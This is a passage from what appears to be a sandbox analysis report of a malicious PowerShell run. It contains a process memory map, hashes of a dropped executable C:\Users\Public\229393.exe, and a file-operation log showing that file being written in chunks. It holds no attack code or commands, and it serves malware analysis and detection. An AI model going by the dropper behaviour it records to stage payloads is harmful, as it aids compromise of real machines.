| private_0x0000000001f60000 | 0x01f60000 | 0x01f60fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x01feffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x01ff0000 | 0x022befff | Memory Mapped File | Readable |
|
|
|
- |
| kernelbase.dll.mui | 0x022c0000 | 0x0237ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000002380000 | 0x02380000 | 0x023fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002400000 | 0x02400000 | 0x027f2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
- |
| sorttbls.nlp | 0x02900000 | 0x02904fff | Memory Mapped File | Readable |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02910000 | 0x02917fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000002920000 | 0x02920000 | 0x02920fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x029affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x02ab0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002ac0000 | 0x02ac0000 | 0x02ac0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002ac0000 | 0x02ac0000 | 0x02ad0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b7ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| sortkey.nlp | 0x02b80000 | 0x02bc0fff | Memory Mapped File | Readable |
|
|
|
- |
| mscorrc.dll | 0x02bd0000 | 0x02c23fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02caffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cd0000 | 0x02cd0000 | 0x02cdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ce0000 | 0x02ce0000 | 0x1acdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001ace0000 | 0x1ace0000 | 0x1b3affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b3b0000 | 0x1b3b0000 | 0x1b4affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b500000 | 0x1b500000 | 0x1b57ffff | Private Memory | Readable, Writable |
|
|
|
- |
| system.management.automation.dll | 0x1b580000 | 0x1b861fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74a50000 | 0x74b18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| powershell.exe | 0x13f830000 | 0x13f8a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fede530000 | 0x7fede6c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x7fede6d0000 | 0x7fede83bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.xml.ni.dll | 0x7fede840000 | 0x7fedeee4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fedeef0000 | 0x7fedef2dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fedef30000 | 0x7fedf047fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fedf050000 | 0x7fedf265fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.ni.dll | 0x7fedf270000 | 0x7fedf354fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fedf360000 | 0x7fedf409fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fedf410000 | 0x7fedf478fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.core.ni.dll | 0x7fedf480000 | 0x7fedf7adfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fedf7b0000 | 0x7fee030cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee0310000 | 0x7fee03c1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x7fee03d0000 | 0x7fee0df2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee0f70000 | 0x7fee1e4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x7fee1e50000 | 0x7fee27ecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fee4f00000 | 0x7fee4f98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fee4fa0000 | 0x7fee500efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fef1db0000 | 0x7fef1de1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| linkinfo.dll | 0x7fef55d0000 | 0x7fef55dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shdocvw.dll | 0x7fef55e0000 | 0x7fef5613fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shfolder.dll | 0x7fef5e80000 | 0x7fef5e86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntshrui.dll | 0x7fef6d70000 | 0x7fef6deffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cscapi.dll | 0x7fef6df0000 | 0x7fef6dfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x7fef8020000 | 0x7fef8076fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| slc.dll | 0x7fefab30000 | 0x7fefab3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x7fefab60000 | 0x7fefab78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x7fefaf00000 | 0x7fefaf2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefb790000 | 0x7fefb7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7fefb7f0000 | 0x7fefb91bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7fefb970000 | 0x7fefbb63fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7fefc000000 | 0x7fefc00bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x7fefc1e0000 | 0x7fefc1fdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7fefc430000 | 0x7fefc476fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7fefc730000 | 0x7fefc746fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x7fefcc30000 | 0x7fefcc52fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefcd30000 | 0x7fefcd3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7fefce40000 | 0x7fefce4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x7fefcf60000 | 0x7fefcf79fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd0f0000 | 0x7fefd125fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7fefd450000 | 0x7fefe1d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefe1e0000 | 0x7fefe3e2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x7fefe400000 | 0x7fefe451fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe590000 | 0x7fefe600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefe7b0000 | 0x7fefe7cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe7e0000 | 0x7fefe90cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7fefe910000 | 0x7fefe9e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7fefeb70000 | 0x7fefed46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7fefee20000 | 0x7fefeeb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7feff120000 | 0x7feff1fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 75 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\public\229393.exe | 2.73 MB |
MD5:
f2eaec8a0c979bc5cc9b6e539e5b53b3
SHA1: ac6b1d839c34bfdef50e9f864ed956b5aeafba1a SHA256: 4585b82d8a7d67d25405f4bc388070ff3d6e674d964c8eb6b25cb87b786f4ad3 |
|
|
Host Behavior
File (460)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Public\229393.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
7 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\Public\229393.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\Public\229393.exe | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 4096 |
|
39 | |
| Write | C:\Users\Public\229393.exe | size = 4616 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 20588 |
|
3 | |
| Write | C:\Users\Public\229393.exe | size = 5808 |
|
7 | |
| Write | C:\Users\Public\229393.exe | size = 27588 |
|
3 | |
| Write | C:\Users\Public\229393.exe | size = 49368 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 23232 |
|
3 | |
| Write | C:\Users\Public\229393.exe | size = 26396 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 23492 |
|
3 | |
| Write | C:\Users\Public\229393.exe | size = 17684 |
|
2 | |
| Write | C:\Users\Public\229393.exe | size = 8712 |
|
3 | |
| Write | C:\Users\Public\229393.exe | size = 10684 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 26136 |
|
2 | |
| Write | C:\Users\Public\229393.exe | size = 29040 |
|
3 | |
| Write | C:\Users\Public\229393.exe | size = 55696 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 18876 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 22040 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 7260 |
|
5 | |
| Write | C:\Users\Public\229393.exe | size = 20328 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 4356 |
|
7 | |
| Write | C:\Users\Public\229393.exe | size = 24944 |
|
3 | |
| Write | C:\Users\Public\229393.exe | size = 60984 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 6068 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 29300 |
|
2 | |
| Write | C:\Users\Public\229393.exe | size = 11616 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 33396 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 13328 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 11876 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 48176 |
|
